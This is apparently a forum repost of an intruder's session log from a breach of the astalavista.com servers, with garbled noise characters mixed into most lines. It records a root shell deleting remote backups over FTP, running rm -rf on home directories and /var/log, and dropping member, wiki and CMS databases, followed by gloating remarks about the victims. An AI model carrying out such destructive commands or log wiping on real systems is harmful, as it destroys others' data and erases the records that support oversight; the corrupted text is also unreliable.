$ }; c; ?( Q* @, }8 F: @, r& d" U, Iftp> ls -la
/ \5 e! ~2 v' o% |( P227 Entering Passive Mode (212,254,194,163,2,189)
; G7 K' L9 g7 b* f150 Opening BINARY mode data connection for ‘file list’.( s5 S" N) X/ L3 B, |: D
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar9 }$ z1 r6 V1 [( R2 A
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
% Q" {# w& ]1 p# f4 H0 w-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
% P9 N' e# V# k9 o: s-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
' M3 r9 @0 Q$ t6 h4 z-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
( Y. z- [% H9 x/ n5 B2 e0 ?8 v/ A; j[snip]9 u7 M2 K3 s! C% U
226 Transfer complete.: \5 Q3 R, Y3 }* j# I" O7 v9 |
ftp> mdelete *6 S! ?' U6 H$ c! |9 A. t7 T
ftp> ls -la! b' w3 X5 x( ~" g0 y
227 Entering Passive Mode (212,254,194,163,2,193)
$ l' e6 D, M' `; Y' D150 Opening BINARY mode data connection for ‘file list’.+ R3 w- a Z D+ w
226 Transfer complete.+ E1 T0 Q$ J* I P9 r7 x
ftp>( @, |' z' `$ U6 E
+ K$ e1 }0 ?( D: Lsh-3.2# cd /home7 X8 }/ V8 I; L8 q( s! u
sh-3.2# ls -la4 @6 G# X8 O; \( i- T
total 120
0 |, r7 f* I0 s5 W; \( y) K3 ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
; A/ z' D C; U( tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
1 \! k7 j( v# l% F% j5 Ldrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
) N2 J8 g6 c) b+ r-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
- [8 E2 X4 I: H* N9 v5 ~ e ~-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
; j0 F7 P5 R! d: z) I" Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
) J' F$ J! n6 l" x2 wdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
7 K) S# Y: s/ e* ]$ @+ Y `drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
6 g8 m1 M9 }" p8 z: a. ?1 W8 w" jdrwx–x–x 10 com com 4096 Apr 28 12:40 com
/ a6 z, o& h4 s" H' v3 Hdrwxr-xr-x 2 root root 4096 May 17 2007 ftp3 D4 U5 E) C; V+ d7 r. M$ b' Y
drwx—— 3 jon jon 4096 Sep 21 2007 jon
7 N4 I( n1 M. \% q# wdrwx—— 2 root root 16384 Sep 11 2007 lost+found
, a" k! H# J% F$ a1 gdrwxr-xr-x 2 root root 4096 Sep 14 2007 my. q+ _* _- Q: _, l7 J
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata& K# a9 ]0 O7 [
drwx—— 2 jon jon 4096 Sep 15 2007 test6 D# a8 w# H8 t. C9 y5 c) ]# V! K
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp M" \/ L6 ]& a4 `1 a
) z* r9 S! q! _: |: n1 l
sh-3.2# rm -rf backup/
9 _! q7 a8 y/ y! Vsh-3.2# rm -rf backup.14161/
$ J2 c8 |, @5 \1 N2 U' osh-3.2# rm -rf ftp/0 B8 J, }1 J W
sh-3.2# rm -rf jon/
3 X4 n* t2 ~5 s: `. h/ }sh-3.2# rm -rf my/
$ z- |! p% t, q/ @ D0 {' U ^6 i w5 `sh-3.2# rm -rf mysqldata/
$ k: A& [2 v Z7 t( y: Xsh-3.2# rm -rf test/
" G' E7 |/ H0 _- b* Xsh-3.2# rm -rf tmp/4 `9 J' Y" X! w
sh-3.2# cd ~" s% i Q' K; B3 S: K
sh-3.2# rm -rf *+ S; P3 q3 [7 h5 |6 \
sh-3.2# rm -rf /var/log/
) x' ^' C& i( A- v4 q& c' }rm: cannot remove directory `/var/log//proftpd’: Directory not empty1 g8 T- f: W0 g& Y F, X. s. J
sh-3.2# rm -rf /home/*
7 S' ]& e+ S% K9 \, A8 \% M2 q: osh-3.2# mysql# _# r8 Q6 @0 Y9 S9 j
Welcome to the MySQL monitor. Commands end with ; or \g.
. J+ I0 R" O f* o* ~/ p; O+ wYour MySQL connection id is 407156 d7 q' F1 }: N9 X, H* ~6 _
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
4 h/ w% F1 s% m
) x( D" L; S3 ~ g" l4 {# k6 w7 OType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( G7 E! ]5 W! |2 K
7 h+ L2 J' F# a) Lmysql> show databases;
. G z! ?0 [$ i# I. h% G7 u+———————–+
0 f3 G9 f* C1 j! M| Database |
, k, q; \) i; m5 ?" d2 l1 ?+———————–+2 ~9 M$ Z4 R( ^& p1 P
| information_schema |
" Y8 s' J. k* [1 k4 k| astanet_ads |
; k+ R& z! ?4 `) [/ f( I f: y| astanet_mailing_lists |
0 e3 c; D! C( U0 p) J) V; ~2 M| astanet_mediawiki |, G$ G; r2 B1 V) F
| astanet_membersystem |
X7 M0 e' x9 O% S4 ^+ \! J1 ?| com_contrexx |
( L8 K& |- t, O( r- n' u| com_contrexx2 |/ P- B1 v9 K9 |$ K m9 _+ C' c( G
| com_contrexx2_live |& a8 P1 O( j) [( D; }# w
| da_roundcube |
. U8 F. g; ?8 c, b3 z| dolphin |
, L2 B, e: {9 I6 { o( s| ideapool |
8 x9 j" L' r9 l6 {: c4 W3 o- o| mysql |3 P" N# P" E. W$ S
| test |0 H9 L0 g9 ?5 e' X
| yourmaster |
; F9 a4 b1 E/ j. R, V+———————–+
; X& A7 f/ p; L4 c+ G% u- J0 y% d14 rows in set (0.03 sec)
. ]" g' a* ^/ G" A/ E: o6 S, |- `) h; z5 a4 u; J
mysql> drop database astanet_membersystem;
, H! A" g6 d* E% ^droQuery OK, 46 rows affected (0.81 sec)' [ Y6 r: s+ E3 F- C H5 H% M
5 u: E) u9 e, Hmysql> drop database com_contrexx;) F2 ?1 w* W: S+ n
Query OK, 211 rows affected (2.72 sec)* z. N3 h0 ?5 W) r+ W
: C. m: i: Z2 H. h
mysql> drop database com_contrexx2;
; H' k. o: R' M4 M1 H' uQuery OK, 237 rows affected (2.23 sec)- W2 w& }$ ]7 Z) [1 D
! L6 n) s$ z: ^& p2 G5 Y7 Amysql> drop database com_contrexx2_live;$ a+ A& `0 f m* }0 }" i
Query OK, 227 rows affected (7.63 sec)5 z& y( O* `; C3 h# c$ j5 `4 ]$ G
q- f- O6 v. q* N5 Hmysql> drop database ideapool;: A% k0 o0 ?+ W4 Y1 o1 |& s
Query OK, 69 rows affected (0.19 sec)
+ o7 N7 G" \( R
+ L" I6 Z4 @" B' u5 Z$ o% M3 l8 Bmysql> drop database yourmaster;
- r2 l9 ^9 X1 i" u' aQuery OK, 158 rows affected (0.55 sec)
7 Q/ S; p3 ]' d# |* @
& Z1 @! |1 G2 a- {; D* Rmysql> drop database astanet_ads;! \4 J8 x) v* l: I/ Q# \ W
Query OK, 9 rows affected (0.11 sec)
" ?/ z0 X j' p* \0 _$ v+ X/ |: t
( w7 N' Z' t7 ?9 X) fmysql> drop database astanet_mailing_lists;5 ]; ~0 C" y. ?/ ~) f
Query OK, 24 rows affected (1.47 sec)3 j" Y, T, {& g# \4 \) g& ^
. e. _9 w2 B" a b/ p$ e
mysql> drop database astanet_mediawiki;
& Q0 u& s8 @1 q$ aQuery OK, 31 rows affected (0.51 sec)$ ^4 D8 y+ }" }
: H' v9 I" Z, y* S7 u. Lmysql> show databases;$ i8 K- D& D# g
+——————–+
: s7 @* c! v6 f; ]. ]7 b7 P# k3 H/ M| Database |
8 B) s1 `8 X+ e. |( \& L+——————–+
3 X, O: F6 x. t9 N7 L# n| information_schema |- k$ j2 k! A4 o
| da_roundcube |
' j1 T+ B- r) [# d. V: a: m& Z| dolphin | v* b& K# e- y3 x1 T9 B
| mysql |
( N; Y) R4 [" J y, e, Q3 Y$ ^| test |2 [9 V0 Q% q' j
+——————–+% @* X" i& n% O' {3 ]- k
5 rows in set (0.00 sec), }: [6 B9 U/ {: Z
; h0 V, q2 \/ ]% ZWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
* A$ M' z# {; P, X( [+ ]their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
9 X3 {9 J( h7 {9 U) T6 _wrong to say this pack of morons *wont be back*.1 ~, \& W7 }; B" Y4 C
|
发表于 2012-11-6 21:07:34
收藏
支持
反对